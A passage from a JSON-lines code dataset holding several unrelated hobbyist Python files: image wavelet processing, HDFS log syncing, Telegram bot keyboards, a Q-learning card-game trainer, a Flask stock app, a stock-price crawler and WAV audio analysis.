i>=row5 and j==2*(i-row5)+1:\n haar_front4[i][j]=0.5;\n \n\n\nfor i in range(0,col4):\n for j in range(0,col4):\n if i=col5 and j==2*(i-col5): \n haar_back4[i][j]=-0.5;\n elif i>=col5 and j==2*(i-col5)+1:\n haar_back4[i][j]=0.5;\n \n \nhaar_back4=haar_back4.transpose(); \n\nhaar_front4=np.mat(haar_front4);\nhaar_back4=np.mat(haar_back4);\n\nimag_haar4=haar_front4*imag4*haar_back4;\nimag_haar_abs4=np.zeros(shape=(row4,col4));\n\nfor i in range(0,row4):\n for j in range(0,col4):\n Num=abs(imag_haar4.item((i,j)));\n imag_haar_abs4[i][j]=Num\n\ncv2.imwrite('ca_haar4.png',imag_haar_abs4);\n\n\n\nimag_haar_resize4=np.zeros(shape=(row3,col3));\nimag_haar_resize4=cv2.resize(imag_haar_abs4,(row3,col3));\n\n\nimag_haar_mult3=np.zeros(shape=(row3,col3));\nfor i in range(0,row3):\n for j in range(0,col3):\n Num=(imag_haar_abs3.item((i,j))*imag_haar_resize4.item((i,j)))**(0.5);\n imag_haar_mult3[i][j]=Num;\n\ncv2.imwrite('ca_haar_mult3.png',imag_haar_mult3);\n\n\n\nimag_mult_edge3=np.zeros(shape=(row3,col3));\nfor i in range(0,row3):\n for j in range(0,col3):\n if i None:\n super().__init__(*args, **kwargs)\n self.hdfs_url = hdfs_url\n self.hdfs_path = hdfs_path\n self.user = user\n\n self.client = InsecureClient(self.hdfs_url, root=self.hdfs_path, user=self.user)\n self.client.makedirs(str(self.sync_path))\n\n @util.preserve_random_state\n def sync(self) -> None:\n for path in self.to_sync():\n file_name = str(self.sync_path.joinpath(path.name))\n\n logging.debug(f\"Uploading {path} to {self.hdfs_path}\")\n\n self.client.upload(file_name, str(path))\n self._synced_event_sizes[path] = path.stat().st_size\n","sub_path":"harness/determined/tensorboard/hdfs.py","file_name":"hdfs.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"524842268","text":"from aiogram import types\nfrom aiogram.types import InlineKeyboardButton, InlineKeyboardMarkup, ReplyKeyboardMarkup, KeyboardButton\n\nimport fastdb\nfrom classes import Position\n\nadmin_inline_main = ['Редактирование позиций', 'Контроль остатков', 'Настройки']\nadmin_inline_redactpos = 
[\"редактировать\", \"добавить\", \"Удалить\", \"вернуться назад\"]\n\nmenu_reply_main = [['каталог', 'корзина'], ['акции', 'активные заказы']]\n\nzak_stat = [\"обрабатывается\", \"выполняется\", \"завершен\"]\n\n\ndef get_onadd_ikeyb():\n inline_keyb = InlineKeyboardMarkup()\n inline_keyb.add(InlineKeyboardButton(\"продолжить покупки\", callback_data='nextcash'))\n inline_keyb.add(InlineKeyboardButton(\"перейти в корзину\", callback_data='gocard'))\n return inline_keyb\n\ndef get_admin_zakazcontrol_ikeyb():\n inline_keyb = InlineKeyboardMarkup()\n inline_keyb.add(InlineKeyboardButton(\"Следующий статус\", callback_data='nextstat'))\n return inline_keyb\n\n\ndef get_admin_inline_ikeyb():\n inline_keyb = InlineKeyboardMarkup()\n callback_num = 0\n for text_btn in admin_inline_main:\n callback_num += 1\n inline_keyb.add(InlineKeyboardButton(text_btn, callback_data='adminmain' + str(callback_num)))\n return inline_keyb\n\n\ndef get_admin_redactpos_ikeyb():\n inline_keyb = InlineKeyboardMarkup()\n iter = 0\n for text_btn in admin_inline_redactpos:\n iter += 1\n inline_btn = InlineKeyboardButton(text_btn, callback_data='adminredactpos' + str(iter))\n inline_keyb.add(inline_btn)\n return inline_keyb\n\ndef get_admin_redactsettings_ikeyb():\n inline_keyb = InlineKeyboardMarkup()\n inline_keyb.add(InlineKeyboardButton(\"Изменить\", callback_data='adminsred'))\n inline_keyb.add(InlineKeyboardButton(\"Назад\", callback_data='adminsback'))\n return inline_keyb\n\ndef get_admin_sectionpick_rkeyb():\n text_btns = []\n for text_btn in fastdb.ALL_SECTIONS:\n text_btns.append([text_btn])\n print(text_btn)\n return ReplyKeyboardMarkup(text_btns, resize_keyboard=True)\n\n\ndef get_admin_fsectionpick_rkeyb():\n text_btns = []\n for text_btn in fastdb.ALL_FSECTIONS:\n text_btns.append([text_btn])\n print(text_btn)\n return ReplyKeyboardMarkup(text_btns, resize_keyboard=True)\n\n\ndef get_main_menu_rkeyb(isadmin: bool):\n text_btns = menu_reply_main\n print(text_btns)\n if isadmin:\n text_btns.append(['админ панель'])\n return ReplyKeyboardMarkup(text_btns, resize_keyboard=True)\n\n\ndef get_catalog_section_rkeyb():\n inline_kb1 = InlineKeyboardMarkup()\n for sec in fastdb.ALL_SECTIONS:\n inline_kb1.add(InlineKeyboardButton(sec, callback_data=sec))\n return inline_kb1\n\n\ndef get_catalog_fsection_rkeyb(section: str):\n inline_kb1 = InlineKeyboardMarkup()\n for sec in fastdb.get_fsections_from_section(section):\n inline_kb1.add(InlineKeyboardButton(sec, callback_data=sec))\n inline_kb1.add(InlineKeyboardButton(\"Назад\", callback_data='back'))\n return inline_kb1\n\n\n text_btns = []\n text_btns.append([\"назад\"])\n for text_btn in fastdb.get_fsections_from_section(section):\n text_btns.append([text_btn])\n return ReplyKeyboardMarkup(text_btns, resize_keyboard=True)\n\n\ndef get_catalog_interactive_ikeyb(prew: bool, next: bool, isopisopen: bool):\n nextcall = 'next'\n prewcall = 'prew'\n if isopisopen:\n opisbtntext = 'инфо'\n else:\n opisbtntext = 'инфо'\n if prew:\n prewtext = '⬅️'\n else:\n prewcall = 'noprew'\n prewtext = '❌'\n if next:\n nexttext = '➡️'\n else:\n nextcall = 'nonext'\n nexttext = '❌'\n inline_keyb = InlineKeyboardMarkup(row_width=3)\n btnprew = InlineKeyboardButton(prewtext, callback_data=prewcall)\n btnnext = InlineKeyboardButton(nexttext, callback_data=nextcall)\n btnopis = InlineKeyboardButton(opisbtntext, callback_data='showopis')\n btncash = InlineKeyboardButton('добавить в корзину', callback_data='cash')\n inline_keyb.add(btnprew, btnopis, btnnext)\n inline_keyb.add(btncash)\n 
inline_keyb.add(InlineKeyboardButton(\"Назад\", callback_data='back'))\n return inline_keyb\n\n\ndef get_addtocard_ikeyb():\n inline_keyb = InlineKeyboardMarkup(row_width=3)\n btnsmall = InlineKeyboardButton('меньше', callback_data='small')\n btnbig = InlineKeyboardButton('больше', callback_data='big')\n btnok = InlineKeyboardButton('добавить', callback_data='ok')\n inline_keyb.add(btnsmall, btnok, btnbig)\n return inline_keyb\n\n\ndef get_card_ikeyb():\n inline_keyb = InlineKeyboardMarkup(row_width=1)\n btnsmall = InlineKeyboardButton('оформить заказ', callback_data='add')\n btnbig = InlineKeyboardButton('очистить корзину', callback_data='clear')\n inline_keyb.add(btnsmall)\n inline_keyb.add(btnbig)\n return inline_keyb\n\n\ndef get_dostavka_ikeyb():\n inline_keyb = InlineKeyboardMarkup(row_width=1)\n btnsmall = InlineKeyboardButton(f'курьером (+{str(fastdb.DOSTAVKA_COST)}р.)', callback_data='kura')\n btnbig = InlineKeyboardButton('самовывоз (пушкинаколотушкина дом 77)', callback_data='samov')\n inline_keyb.add(btnsmall)\n inline_keyb.add(btnbig)\n return inline_keyb\n\n\n","sub_path":"ui/keyboards.py","file_name":"keyboards.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"325835785","text":"# g=[[],[],[],[]]\n# #a[1][2][3][4]=1\n# for i in range(4):\n# \tfor j in range(4):\n# \t\tfor a in range(4):\n# \t\t\tfor b in range(4):\n# \t\t\t\ta[i][j][a][b] = \n# print (g)\nimport random\nimport numpy as np\nfrom result import *\nfrom Judge import *\nfrom GradetheCard import *\nimport time\nfrom GenAct import *\nfrom GradeAgent import *\nstart = time.clock()\n\n\n#w, h, radius = 5, 10, 10\n# for action11 in range(4):\n# \tstateaction11 = {}\n# \tfor action12 in range(4):\n# \t\tstateaction12 = {}\n# \t\tfor action21 in range(4):\n# \t\t\tstateaction21 = {}\n# \t\t\tfor action22 in range(4):\n# \t\t\t\tstateaction22 = {}\n# \t\t\t\tfor action31 in range(4):\n# \t\t\t\t\tstateaction31 = {}\n# \t\t\t\t\tfor action32 in range(4):\n# \t\t\t\t\t\tstateaction32 = {}\n# \t\t\t\t\t\tfor action41 in range(4):\n# \t\t\t\t\t\t\tstateaction41 = {}\n# \t\t\t\t\t\t\tfor action42 in range(4):\n# \t\t\t\t\t\t\t\tstateaction42 = {}\n# \t\t\t\t\t\t\t\tfor action51 in range(4):\n# \t\t\t\t\t\t\t\t\tstateaction51 = {}\n# \t\t\t\t\t\t\t\t\tfor action52 in range(4):\n# \t\t\t\t\t\t\t\t\t\tstateaction52 = {}\n# \t\t\t\t\t\t\t\t\t\tfor level in range(6):\n# \t\t\t\t\t\t\t\t\t\t\tlevelrank = {}\n# \t\t\t\t\t\t\t\t\t\t\tfor rank in range(52*52*52):\n# \t\t\t\t\t\t\t\t\t\t\t\tlevelrank[rank] = i\n# \t\t\t\t\t\t\t\t\t\t\t\ti = i + 1\n# \t\t\t\t\t\t\t\t\t\t\tstateaction52[level] = levelrank\n# \t\t\t\t\t\t\t\t\t\tstateaction51[action52] = stateaction52\n# \t\t\t\t\t\t\t\t\tstateaction42[action51] = stateaction51\n# \t\t\t\t\t\t\t\tstateaction41[action42] = stateaction42\n# \t\t\t\t\t\t\tstateaction32[action41] = stateaction41\n# \t\t\t\t\t\tstateaction31[action32] = stateaction32\n# \t\t\t\t\tstateaction22[action31] = stateaction31\n# \t\t\t\tstateaction21[action22] = stateaction22\n# \t\t\tstateaction12[action21] = stateaction21\n# \t\tstateaction11[action12] = stateaction12\n# \tstateaction[action11] = stateaction11\ni = 1\nstate2 = {}\n#for pot in range(10, 10230, 10):\n##########################\n#state\nfor pot in range(10, 640, 10):\n\n\tpotlist = {}\n\t#for R in range(0, 5):\n\tfor R in range(0, 3):\n\t\troundlist = {}\n\t\t#for delta in [10, 20, 40, 80, 160, 320, 640, 1280, 2560, 5120]:\n\t\tfor delta in [10, 20, 40, 
80, 160, 320]:\n\t\t\tdeltalist = {}\n\t\t\tfor level in range(1, 7):\n\t\t\t\tlevellist = {}\n\t\t\t\tfor rank in range(1, 2400):\n\t\t\t\t\tlevellist[rank] = i\n\t\t\t\t\ti = i + 1\n\t\t\t\tdeltalist[level] = levellist\n\t\t\troundlist[delta] = deltalist\n\t\tpotlist[R] = roundlist\n\tstate2[pot] = potlist\n\nelapsed = (time.clock() - start)\nprint(\"Time used:\",elapsed)\n\n# for a in range(5):\n\n# \tfor b in range(10):\n# \t\tfor c in range(10):\n# \t\t\though[a][b][c]=1\n# print (stateaction)\n\n# position = np.argmax(stateaction)\n# print (position)\ndef DQLearning(num_episodes, e, gamma, lr, Q1, Q2, GenerateAction1):\n\t\n\tfor epi in range(0, num_episodes):\n\t\t\n\t\ti = 0\n\t\tdone = False\n\t\treward = 0\n\t\taction1 = {}\n\t\taction2 = {}\n\t\tGrade1, Grade2, player1, player2 = Grade()\n\t\t[level1, rank1] = Grade1\n\t\t# if level1 > 1:\n\t\t# \taction111 = (1, 1, 1, 1, 1)\n\t\t# if level1 == 1:\n\t\t# \taction111 = (1, 0, 0)\n\t\t[level, rank] = GradetheAgent()\n\t\twinnerp = judge(Grade1, Grade2)\n\t\taction = (0, 1, 2, 3)\n\t\t#####################\n\t\t#taolu\n\t\tif GenerateAction1 == 1:\n\t\t\taction111 = genact1(level1, rank1)\n\t\tif GenerateAction1 == 2:\n\t\t\taction111 = genact2(level1, rank1)\n\t\tif GenerateAction1 == 3:\n\t\t\taction111 = genact3(level1, rank1)\n\n\t\n\t\t#action1[0] = random.choice(action)\n\t\taction1[0] = action111[0]\n\t\tpot = 30\n\t\tR = 0\n\t\tdelta = 10\n\n\t\tif action1[0] == 0 or action1[0] == 3:\n\t\t\tdone = True\n\t\t\taction2[0] = 0\n\t\t\t#reward = result(action1, action2, winnerp)\n\t\tif action1[0] == 1:\n\t\t\tpot = 10\n\t\t\tdelta = 10\n\t\tif action1[0] == 2:\n\t\t\tpot = 20\n\t\t\tdelta = 20\n\t\tstate = state2[pot][R][delta][level][rank]\n\n\n\n\t\twhile not done:\n\t\t\tif action1[i] == 0 or action1[i] == 3:\n\t\t\t\treward = result(action1, action2, winnerp)\n\t\t\t\tQ1[state][0] = Q1[state][0] + lr*reward\n\t\t\t\tQ1[state][1] = Q1[state][1] + lr*reward\n\t\t\t\tQ1[state][2] = Q1[state][2] + lr*reward\n\t\t\t\tQ1[state][3] = Q1[state][3] + lr*reward\n\t\t\t\tQ2[state][0] = Q2[state][0] + lr*reward\n\t\t\t\tQ2[state][1] = Q2[state][1] + lr*reward\n\t\t\t\tQ2[state][2] = Q2[state][2] + lr*reward\n\t\t\t\tQ2[state][3] = Q2[state][3] + lr*reward\n\t\t\t\tbreak\n\t\t\tif action1[i] == 1 or action1[i] == 2:\n\t\t\t\ta = random.random()\n\t\t\t\tif a < 1-4/3*e:\n\t\t\t\t\taction2[i] = np.argmax(Q1[state] + Q2[state])\n\t\t\t\telse:\n\t\t\t\t\taction2[i] = random.choice(action)\n\n\t\t\t\t#action1[i+1] = random.choice(action)\n\t\t\t\taction1[i+1] = action111[i+1]\n\n\t\t\t\tQA1 = np.zeros(4)\n\t\t\t\tQA2 = np.zeros(4)\n\n\t\t\t\t#if (action2[i] == 0 or action2[i] == 3) or R == 4:\n\t\t\t\tif (action2[i] == 0 or action2[i] == 3) or R == 2:\n\t\t\t\t\treward = result(action1, action2, winnerp)\n\t\t\t\t\tQ1[state][action2[i]] = Q1[state][action2[i]] + lr*reward\n\t\t\t\t\tQ2[state][action2[i]] = Q2[state][action2[i]] + lr*reward\n\t\t\t\t\tbreak\n\n\t\t\t\tif action2[i] == 1:\n\t\t\t\t\tif action1[i+1] == 1:\n\t\t\t\t\t\tpot = pot + 2*delta\n\t\t\t\t\tif action1[i+1] == 2:\n\t\t\t\t\t\tpot = pot + 3*delta\n\t\t\t\t\t\tdelta = 2*delta\n\t\t\t\tif action2[i] == 2:\n\t\t\t\t\tif action1[i+1] == 1:\n\t\t\t\t\t\tpot = pot + 4*delta\n\t\t\t\t\t\tdelta = 2*delta\n\t\t\t\t\tif action1[i+1] == 2:\n\t\t\t\t\t\tpot = pot + 6*delta\n\t\t\t\t\t\tdelta = 4*delta\n\n\t\t\tstatep = state2[pot][R][delta][level][rank]\n\t\t\tfor actionp in range(0, 4):\n\t\t\t\tQA1[actionp] = Q1[statep][actionp]\n\t\t\t\tQA2[actionp] = 
Q2[statep][actionp]\n\t\t\tRanRate = random.random()\n\t\t\tif RanRate < 0.5:\n\t\t\t\tQ1[state][action2[i]] = Q1[state][action2[i]] + lr*(reward + gamma * max(QA2) - Q1[state][action2[i]])\n\t\t\tif RanRate > 0.5:\n\t\t\t\tQ2[state][action2[i]] = Q2[state][action2[i]] + lr*(reward + gamma * max(QA1) - Q2[state][action2[i]])\n\t\t\tstate = statep\n\t\t\tR = R + 1\n\t\t\ti = i + 1\n\n\t\t# if epi > 999900:\n\t\t# \tprint(action2)\n\treturn Q1, Q2\n\n\t\t\n\t#print(action1)\n\t\n\n\n\n\n\n\t\t\n\n\nQ1 = np.zeros((1360000000, 4))\nQ2 = np.zeros((1360000000, 4))\nQ1, Q2 = DQLearning(10000000, 0.1, 0.9, 0.1, Q1, Q2, 1)\nQ1, Q2 = DQLearning(10000000, 0.1, 0.9, 0.1, Q1, Q2, 2)\nQ1, Q2 = DQLearning(1000000, 0.1, 0.9, 0.1, Q1, Q2, 3)\nelapsed = (time.clock() - start)\nprint(\"Time used:\",elapsed)\n\n\nfor game in range(200):\n\ttol = 0\n\tfor i in range(5):\n\t\t# print\n\t\t# print('the Game Begins')\n\t\tGrade1, Grade2, player1, player2 = Grade()\n\t\t# print('cards of Player1:')\n\t\t# print(player1)\n\t\t[level, rank] = Grade2\n\t\twinnerp = judge(Grade1, Grade2)\n\t\taction = (0, 1, 2, 3)\n\t\taction1 = {}\n\t\taction2 = {}\n\t\tpot = 20 \n\t\tdelta = 10\n\t\t#for R in range(0, 5):\n\t\tfor R in range(0, 3):\n\t\t\tQP = np.zeros(4)\n\n\t\t\taction1[R] = random.randint(0, 3)\n\t\t\tif action1[R] == 0 or action1[R] == 3:\n\t\t\t\taction2[R] = 0\n\t\t\t\treward = result(action1, action2, winnerp)\n\t\t\t\tbreak\n\t\t\t\n\t\t\tif action1[R] == 1:\n\t\t\t\tpot = pot + delta\n\t\t\t\tstate = state2[pot][R][delta][level][rank]\n\t\t\t\tfor actionp in range(0, 4):\n\t\t\t\t\tQP[actionp] = Q1[state][actionp] + Q2[state][actionp]\n\t\t\t\taction2[R] = np.argmax(QP)\n\t\t\t\tif action2[R] == 1:\n\t\t\t\t\tpot = pot + delta\n\t\t\t\tif action2[R] == 2:\n\t\t\t\t\tpot = pot + 2 * delta\n\t\t\t\t\tdelta = 2 * delta\n\n\n\t\t\tif action1[R] == 2:\n\t\t\t\tpot = pot + 2 * delta\n\t\t\t\tdelta = 2 * delta\n\t\t\t\tstate = state2[pot][R][delta][level][rank]\n\t\t\t\tfor actionp in range(0, 4):\n\t\t\t\t\tQP[actionp] = Q1[state][actionp] + Q2[state][actionp]\n\t\t\t\taction2[R] = np.argmax(QP)\n\t\t\t\tif action2[R] == 1:\n\t\t\t\t\tpot = pot + delta\n\t\t\t\tif action2[R] == 2:\n\t\t\t\t\tpot = pot + 2 * delta\n\t\t\t\t\tdelta = 2 * delta\n\n\t\t\t# print('action2:')\n\t\t\t# print(action2[R])\n\t\t\tif action2[R] == 0 or action2[R] == 3:\n\t\t\t\treward = result(action1, action2, winnerp)\n\t\t\t\tbreak \n\t\t\tif R ==2:\n\t\t\t#if R ==4:\n\t\t\t\treward = result(action1, action2, winnerp)\n\t\t\tR = R + 1\n\n\n\t\t# print('cards of Player2:')\n\t\t# print(player2)\n\t\t# print('action of player2:')\n\t\t# print(action2)\n\t\t# print('player2 wins:')\n\t\t# print(reward)\n\t\t# #print('winner:')\n\t\t# print\n\t\t# print('End of the Game')\n\t\ttol = tol + reward\n\t\ti = i + 1\n\tprint(tol)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"qq.py","file_name":"qq.py","file_ext":"py","file_size_in_byte":7497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"536392857","text":"#!/usr/bin/env python\n\nimport asyncio\n\n# this example asyncio uses the new async and await syntax\n# 1) instead of @asyncio.coroutine we use the async keyword to mark coroutine\n# functions\n# 2) instead of using 'yield from' to give back control to the event loop,\n# we use the await keyword\n\n\n# define a coroutine function, which returns a coroutine object\nasync def delayed_result(delay, result): \n await asyncio.sleep(delay)\n print(result)\n return result\n\n# get an event 
loop\nloop = asyncio.get_event_loop()\n\nx = loop.run_until_complete(delayed_result(1.5, 23))\n\n","sub_path":"python/async/delayed_coroutine2.py","file_name":"delayed_coroutine2.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"456046446","text":"from flask import Flask, redirect, render_template\nfrom flask.ext.compress import Compress\nimport requests\nfrom decimal import getcontext, Decimal\n\napp = Flask(__name__)\nCompress(app)\napp.config['DEBUG'] = True\napp.config['TESTING'] = True\n\n\n@app.route('/')\ndef root_redirect():\n return redirect(\"/AAPL\", code=302)\n\n\n@app.route('/', methods=['GET'])\ndef check(ticker):\n ticker = ticker.upper() # make ticker uppercase to prevent errors\n yahoo_api = requests.get(\"http://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20yahoo.finance.quotes%20where%20symbol%20IN%20(%22\" + ticker + \"%22)&format=json&env=http://datatables.org/alltables.env\")\n stocktwits_api = requests.get(\"https://api.stocktwits.com/api/2/streams/symbol/\" + ticker + \".json\")\n getcontext().prec = 5\n\n def parse_yahoo(detail):\n parsed_yahoo_detail = yahoo_api.json()['query']['results']['quote'][detail]\n return parsed_yahoo_detail\n\n def parse_stocktwits_feed():\n stocktwits_feed = {}\n for i in range(0, 30): # 30 is rate limit\n if stocktwits_api:\n message = stocktwits_api.json()['messages'][i]['body']\n username = stocktwits_api.json()['messages'][i]['user']['username']\n stocktwits_feed[i] = message + \" ~\" + username\n return stocktwits_feed\n\n def get_short_term_rating():\n upside = get_upside()\n eps_upside = get_eps_upside()\n if upside and eps_upside is not None:\n upside_weight = upside * Decimal(0.75)\n eps_upside_weight = eps_upside * Decimal(0.25)\n rating = upside_weight + eps_upside_weight\n return rating\n\n def get_upside():\n target_price_parse = parse_yahoo(\"OneyrTargetPrice\")\n price = get_price()\n if target_price_parse and price is not None:\n target_price = Decimal(target_price_parse)\n upside = (Decimal(target_price - price) / price) * 100\n return upside\n\n def get_price():\n ask_parse = parse_yahoo(\"Ask\")\n bid_parse = parse_yahoo(\"Bid\")\n if ask_parse and bid_parse is not None:\n price = (Decimal(ask_parse) + Decimal(bid_parse)) / 2\n return price\n\n def get_eps_upside():\n eps_current_year_parse = parse_yahoo(\"EPSEstimateCurrentYear\")\n eps_next_year_parse = parse_yahoo(\"EPSEstimateNextYear\")\n if eps_current_year_parse and eps_next_year_parse is not None:\n eps_current_year_dec = Decimal(eps_current_year_parse)\n eps_next_year_dec = Decimal(eps_next_year_parse)\n eps_upside = ((eps_next_year_dec - eps_current_year_dec) / abs(eps_current_year_dec)) * 100\n return eps_upside\n\n def get_news():\n news = {\n \"stocktwits_url\": \"//stocktwits.com/symbol/\" + ticker,\n 'estimize_url': \"//www.estimize.com/\" + ticker,\n \"earningswhispers_url\": \"//earningswhispers.com/stocks/\" + ticker,\n \"nasdaq_url\": \"//nasdaq.com/earnings/report/\" + ticker,\n \"googlenews_url\": \"//google.com/search?q=\" + ticker + \"+stock&tbm=nws\",\n \"googlefinance_main_url\": \"//google.com/finance?q=\" + ticker,\n \"googlefinance_news_url\": \"//google.com/finance/company_news?q=\" + ticker,\n \"marketbeat_url\": \"//marketbeat.com/stocks/\" + ticker,\n \"closingbell_url\": \"//closingbell.co/stocks/\" + ticker,\n \"bloomberg_url\": \"//bloomberg.com/quote/\" + ticker + \":US\",\n \"thestreet_url\": \"//thestreet.com/quote/\" + 
ticker + \".html\",\n }\n return news\n\n stock = {\n \"short_term_rating\": get_short_term_rating(),\n \"symbol\": parse_yahoo(\"symbol\"),\n \"name\": parse_yahoo(\"Name\"),\n \"currency\": parse_yahoo(\"Currency\"),\n \"upside\": str(get_upside()) + \"%\",\n \"target_price\": parse_yahoo(\"OneyrTargetPrice\"),\n \"price\": get_price(),\n \"ask\": parse_yahoo(\"Ask\"),\n \"bid\": parse_yahoo(\"Bid\"),\n \"ask_real_time\": parse_yahoo(\"AskRealtime\"),\n \"bid_real_time\": parse_yahoo(\"BidRealtime\"),\n \"amount_change\": parse_yahoo(\"Change\"),\n \"percent_change\": parse_yahoo(\"ChangeinPercent\"),\n \"year_low\": parse_yahoo(\"YearLow\"),\n \"year_high\": parse_yahoo(\"YearHigh\"),\n \"year_range\": parse_yahoo(\"YearRange\"),\n \"day_range\": parse_yahoo(\"DaysRange\"),\n \"volume\": parse_yahoo(\"Volume\"),\n \"market_cap\": parse_yahoo(\"MarketCapitalization\"),\n \"average_daily_volume\": parse_yahoo(\"AverageDailyVolume\"),\n \"eps_upside\": str(get_eps_upside()) + \"%\",\n \"eps_estimate_current_year\": parse_yahoo(\"EPSEstimateCurrentYear\"),\n \"eps_estimate_next_year\": parse_yahoo(\"EPSEstimateNextYear\"),\n \"eps_estimate_next_quarter\": parse_yahoo(\"EPSEstimateNextQuarter\"),\n \"pe_ratio\": parse_yahoo(\"PERatio\"),\n \"peg_ratio\": parse_yahoo(\"PEGRatio\"),\n \"news\": get_news(),\n \"stocktwits_feed\": parse_stocktwits_feed(),\n }\n return render_template(\"index.html\", stock=stock)\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"29836244","text":"import urllib.request\nimport pymysql\n\nfrom bs4 import BeautifulSoup\n\n# 주식 사이트 크롤링하여 DB에 저장\ndef insertStock(tups):\n conn = pymysql.connect(host='localhost', user='root', password='java',\n db='python', charset='utf8')\n \n curs = conn.cursor() # java에서의 statement\n \n sql = \"\"\"insert into stock(\n s_code\n ,s_name\n ,s_price\n ,crawl_date\n )\n values (%s, %s, %s, %s)\"\"\"\n cnt = curs.executemany(sql, tups)\n \n conn.commit()\n conn.close()\n return cnt\n\n\nconn = pymysql.connect(host='localhost', user='root', password='java',\n db='python', charset='utf8')\n\nurl = \"https://vip.mk.co.kr/newSt/rate/item_all.php\"\n\nrequest = urllib.request.Request(url)\nresponse = urllib.request.urlopen(request)\nrescode = response.getcode()\nif rescode == 200:\n response_body = response.read()\n \n html = response_body.decode('euc-kr')\n soup = BeautifulSoup(html, 'html.parser')\n \n text = soup.select_one(\".t_11_black\").get_text()\n crawl_date = \"2021\"+text.replace(\".\",\"\").replace(\" \",\".\").replace(\":\",\"\")\n \n items = soup.select(\".st2\")\n \n tuts = []\n for i,item in enumerate(items):\n s_name = item.a.get_text()\n s_price = item.find_next_sibling(\"td\").get_text().replace(\",\",\"\")\n s_code = item.a['title']\n \n tuts.append((\n s_code,\n s_name,\n s_price,\n crawl_date,\n ))\n \n cnt = insertStock(tuts)\n print(\"cnt : \",cnt)\nelse:\n print(response.status_code)","sub_path":"HTLLOWPYTHON/day07/2_mycraw04_stock.py","file_name":"2_mycraw04_stock.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"603440246","text":"import subprocess\nimport wave\nimport struct\nimport numpy\nimport csv\nimport sys\nimport pyaudio\nimport pylab\nfrom pydub import AudioSegment\nfrom scipy import *\nfrom pylab import *\n\n\n\"\"\"\nsound = 
AudioSegment.from_mp3(\"/Users/felix/Documents/Document/zhuli.mp3\")\nsound.export(\"/Users/felix/Documents/Document\", format=\"wav\")\n\nwf = wave.open(\"/Users/felix/Documents/Document/zhuli.wav\", \"rb\")\np = pyaudio.PyAudio()\nstream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True)\nnframes = wf.getnframes()\nframerate = wf.getframerate()\nstr_data = wf.readframes(nframes)\nwf.close()\n# A new 1-D array initialized from raw binary or text data in a string.\nwave_data = numpy.fromstring(str_data, dtype=numpy.short)\nwave_data.shape = -1, 2\nwave_data = wave_data.T\n# time = numpy.arange(0,nframes)*(1.0/framerate)\n# pylab.plot(time, wave_data[0])\n# pylab.subplot(212)\n# pylab.plot(time, wave_data[1], c=\"g\")\n# pylab.xlabel(\"time (seconds)\")\n# pylab.show()\n#\nN = 44100\nstart = 0\ndf = framerate / (N - 1)\nfreq = [df * n for n in range(0, N)]\nwave_data2 = wave_data[0][start:start + N]\nc = numpy.fft.fft(wave_data2) * 2 / N\nd = int(len(c) / 2)\nwhile freq[d] > 0:\n d -= 10\n pylab.plot(freq[:d - 1], abs(c[:d - 1]), 'r')\npylab.show()\n\nimport wave\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nf = wave.open('/Users/felix/Documents/Document/zhuli.wav', 'rb')\nparams = f.getparams()\nnchannels, sampwidth, framerate, nframes = params[:4]\nstrData = f.readframes(nframes)\nwaveData = np.fromstring(strData, dtype=np.int16)\nwaveData = waveData * 1.0 / (max(abs(waveData)))\n# plot the wave\ntime = np.arange(0, nframes) * (1.0 / framerate)\nplt.plot(time, waveData)\nplt.xlabel(\"Time(s)\")\nplt.ylabel(\"Amplitude\")\nplt.title(\"Single channel wavedata\")\nplt.grid('on')\n\"\"\"\n\nfilename = '/Users/felix/Documents/Document/zhuli2.wav'\nwavefile = wave.open(filename, 'r') # open for writing\n\nnchannels = wavefile.getnchannels()\nsample_width = wavefile.getsampwidth()\nframerate = wavefile.getframerate()\nnumframes = wavefile.getnframes()\n\nprint(\"channel\", nchannels)\nprint(\"sample_width\", sample_width)\nprint(\"framerate\", framerate)\nprint(\"numframes\", numframes)\n# numframes = 500000\ny = zeros(numframes)\n\nis_zero = False\nstart = 0\nfor i in range(numframes):\n # if i < 5904000:\n # continue\n # if i > 6240000:\n # break\n val = wavefile.readframes(i * 48000)\n if i % 48000 != 0:\n continue\n left = val[0:2]\n # right = val[2:4]\n v = struct.unpack('h', left)[0]\n y[i] = v\n if i % 48000 * 5 == 0:\n print(i, y[i], i / 48000)\n\n if v == 0 and not is_zero:\n # print('current frame is zero:', i)\n is_zero = True\n start = i\n elif v != 0 and is_zero:\n if i - start > 48000:\n is_zero = False\n print('end frame:', i - start, ' current:', i, 'time', i / 48000)\n\n# Fs = framerate\n# specgram(y, NFFT=1024, Fs=Fs, noverlap=900)\n# show()\n\n\n\"\"\"\nstrData = wavefile.readframes(numframes)\nwaveData = np.fromstring(strData, dtype=np.int16)\nwaveData.shape = -1,2\n# waveData = waveData.T\n# waveData = waveData * 1.0 / (max(abs(waveData)))\n# plot the wave\ntime = np.arange(0, numframes) * (1.0 / framerate)\nplt.plot(time, waveData)\nplt.xlabel(\"Time(s)\")\nplt.ylabel(\"Amplitude\")\nplt.title(\"Single channel wavedata\")\nplt.grid('on')\nplt.pause(0.001)\nplt.show()\n\"\"\"","sub_path":"tools/audio_tools.py","file_name":"audio_tools.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"163416244","text":"#!/usr/bin/env python\n# coding=utf8\n\nimport rospy\nimport RPi.GPIO as 
